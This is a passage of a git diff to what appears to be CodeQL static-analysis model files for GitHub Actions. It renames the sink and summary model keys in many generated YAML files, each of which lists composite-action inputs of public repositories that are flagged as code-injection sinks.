a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml index cb9faef2bf6..73c9c1f24a2 100644 --- a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] - ["scylladb/scylla-operator", "*", "input.githubToken", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml index e7eb6b732ff..90c4f699308 100644 --- a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml +++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] - ["shader-slang/slang", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml index a1b1a4b71e8..ed4e8820c99 100644 --- a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] - ["shaka-project/shaka-player", "*", "input.context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml index 2463b4a1d16..df51b9fe4c8 100644 --- a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shakacode/react-webpack-rails-tutorial", "*", "input.org", "code-injection", "generated"] - ["shakacode/react-webpack-rails-tutorial", "*", "input.app_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml index 87e88b2c13d..8fca8591ceb 100644 --- a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["simple-icons/simple-icons", "*", "input.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml index c0789d6e424..819728cf718 100644 --- a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["slint-ui/slint", "*", "input.extra-packages", "code-injection", "generated"] - ["slint-ui/slint", "*", "input.binary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml index f617b9d172d..d3eaca780b4 100644 --- a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["solidusio/solidus", "*", "input.last_minor", "code-injection", "generated"] - ["solidusio/solidus", "*", "input.labels", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml index f30719d58d8..42c00ea216b 100644 --- a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["solo-io/gloo", "*", "input.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml index 84d5c96e63b..a93d6a039d4 100644 --- a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sonarr/sonarr", "*", "input.filter", "code-injection", "generated"] - ["sonarr/sonarr", "*", "input.binary_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml index d76ab136ab9..8a7784a6f01 100644 --- a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sonic-pi-net/sonic-pi", "*", "input.command", "code-injection", "generated"] - ["sonic-pi-net/sonic-pi", "*", "input.container-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml index 9e75660d1b3..1b22d43bfad 100644 --- a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spacedriveapp/spacedrive", "*", "input.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml index 1cc6e837b84..7175dd9450b 100644 --- a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml +++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spockframework/spock", "*", "input.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml index b2e283c6983..dca0f00a4ec 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-io/initializr", "*", "input.run-name", "code-injection", "generated"] - ["spring-io/initializr", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml index d08bdb5d6f4..5f75d4fd0cd 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-io/start.spring.io", "*", "input.run-name", "code-injection", "generated"] - ["spring-io/start.spring.io", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml index 4532947bc48..d34a6a1a388 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-projects/spring-boot", "*", "input.run-name", "code-injection", "generated"] - ["spring-projects/spring-boot", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml index 518a27d9afc..b7c5f7e214c 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-projects/spring-framework", "*", "input.run-name", "code-injection", "generated"] - ["spring-projects/spring-framework", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml index bb21bcda68d..eead3b5ace3 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-projects/spring-graphql", "*", "input.run-name", "code-injection", "generated"] - ["spring-projects/spring-graphql", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml index 5f81d9bd406..be7043cfdbf 100644 --- a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["square/workflow-kotlin", "*", "input.commit-message", "code-injection", "generated"] - ["square/workflow-kotlin", "*", "input.fix-task", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml index f8fe2344d0a..36bdef9ad9a 100644 --- a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stefanprodan/podinfo", "*", "input.version", "code-injection", "generated"] - ["stefanprodan/podinfo", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml index 377e439049c..3d66b07df9f 100644 --- a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stellar/go", "*", "input.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 70b2c362464..2f8a3fbdfa6 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml index 7f317ddad8e..e1acb54c724 100644 --- a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["subquery/subql", "*", "input.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml index b1a9ea20344..0a51c708799 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["swagger-api/swagger-codegen", "*", "input.options", "code-injection", "generated"] - ["swagger-api/swagger-codegen", "*", "input.spec-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml index 37e39efd243..0ee56c05777 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["swagger-api/swagger-parser", "*", "input.logsPath", "code-injection", "generated"] - ["swagger-api/swagger-parser", "*", "input.parserSpecPath", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml index 9569d47329f..f17216cf1e8 100644 --- a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tarantool/tarantool", "*", "input.source", "code-injection", "generated"] - ["tarantool/tarantool", "*", "input.chat-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml index 6cf5dd84fbd..551010c6634 100644 --- a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["telepresenceio/telepresence", "*", "input.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml index ce09307f8fb..bd64e336c17 100644 --- a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tensorflow/datasets", "*", "input.extras", "code-injection", "generated"] - ["tensorflow/datasets", "*", "input.tf-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml index 183319e32ff..7d545451867 100644 --- a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["texstudio-org/texstudio", "*", "input.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml index d8fb3f98b09..1ad4a2b824d 100644 --- a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["toeverything/affine", "*", "input.extra-flags", "code-injection", "generated"] - ["toeverything/affine", "*", "input.nmHoistingLimits", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml index c0c663e69f3..60381d41f16 100644 --- a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["treeverse/lakefs", "*", "input.compose-flags", "code-injection", "generated"] - ["treeverse/lakefs", "*", "input.compose-directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml index 35c0d80a115..ac61ed797d5 100644 --- a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["trezor/trezor-firmware", "*", "input.lang", "code-injection", "generated"] - ["trezor/trezor-firmware", "*", "input.model", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml index dc1dcff0b15..7eed41f755e 100644 --- a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tribler/tribler", "*", "input.libsodium-version", "code-injection", "generated"] - ["tribler/tribler", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml index 2da63c894fc..f977f6a5cce 100644 --- a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["trunk-io/trunk-action", "*", "input.tools", "code-injection", "generated"] - ["trunk-io/trunk-action", "*", "input.post-init", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml index 3dc87b3ed76..c4bacdc9c2c 100644 --- a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unidata/metpy", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml index 94a140a9fe1..f4ee4920797 100644 --- a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml +++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unstructured-io/unstructured", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml index d8f78274623..5fae95e5def 100644 --- a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vercel/turbo", "*", "input.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml index f539135bba0..4115d6c98f7 100644 --- a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml +++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vesoft-inc/nebula", "*", "input.target-path", "code-injection", "generated"] - ["vesoft-inc/nebula", "*", "input.bucket", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml index cc8a7f16492..536b37131c1 100644 --- a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vkcom/vkui", "*", "input.next_version", "code-injection", "generated"] - ["vkcom/vkui", "*", "input.package_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml index ec1ed14fed5..54f72118d87 100644 --- a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vuetifyjs/vuetify", "*", "input.name", "code-injection", "generated"] - ["vuetifyjs/vuetify", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml index 18b37d3c658..bed9ae53110 100644 --- a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wagoodman/dive", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml index c1699ec6816..7e9f4e14e85 100644 --- a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["walletconnect/walletconnectswiftv2", "*", "input.js-client-api-host", "code-injection", "generated"] - ["walletconnect/walletconnectswiftv2", "*", "input.project-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml index 0fe9b73b6de..3a16fc74bb6 100644 --- a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml +++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wazuh/wazuh", "*", "input.target", "code-injection", "generated"] - ["wazuh/wazuh", "*", "input.doxygen_config", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml index 27a5defa298..686f1013dd8 100644 --- a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["web-infra-dev/rspack", "*", "input.post", "code-injection", "generated"] - ["web-infra-dev/rspack", "*", "input.profile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml index 05fd2667812..6a6cb61c174 100644 --- a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["webassembly/wabt", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml index 5a91e3cd32f..513cd4d7644 100644 --- a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wntrblm/nox", "*", "input.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml index bb632423a1c..2855a6d4e01 100644 --- a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml +++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["xrplf/rippled", "*", "input.configuration", "code-injection", "generated"] - ["xrplf/rippled", "*", "input.cmake-target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml index dca76acdc27..78a2cc4e0ce 100644 --- a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zcash/zcash", "*", "input.destination", "code-injection", "generated"] - ["zcash/zcash", "*", "input.remove-first-if-exists", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml index c0e357715de..8db73d2fc77 100644 --- a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zenml-io/zenml", "*", "input.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml index 2bc23972e78..8b0deda070d 100644 --- a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zeroc-ice/ice", "*", "input.flags", "code-injection", "generated"] - ["zeroc-ice/ice", "*", "input.make_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml index 740bfd26d69..3f7a7e7fda8 100644 --- 